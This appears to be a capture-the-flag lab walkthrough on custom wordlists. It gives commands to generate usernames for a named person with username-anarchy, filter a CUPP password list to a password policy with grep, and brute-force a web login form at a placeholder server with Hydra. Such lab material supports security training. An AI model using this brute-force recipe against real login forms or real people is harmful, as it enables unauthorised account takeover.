Custom Wordlists
After successfully brute-forcing, and then logging into the target, what is the full flag you find?
Getting the flag:
Step 1 - Generate usernames:
./username-anarchy Jane Smith > jane_smith_usernames.txt
Step 2 - Use CUPP to create a personalized password list:
Step 3 - Filter the password to match the following policy:
Minimum Length: 6 characters
Must Include:
At least one uppercase letter
At least one lowercase letter
At least one number
At least two special characters (from the set
!@#$%^&*
)
grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > jane-filtered.txt
Step 4 - Brute-force the login form with Hydra:
hydra -L jane_smith_usernames.txt -P jane-filtered.txt SERVER_IP -s SERVERPORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
Step 5 - Login with the credentials and get the flag:

Last updated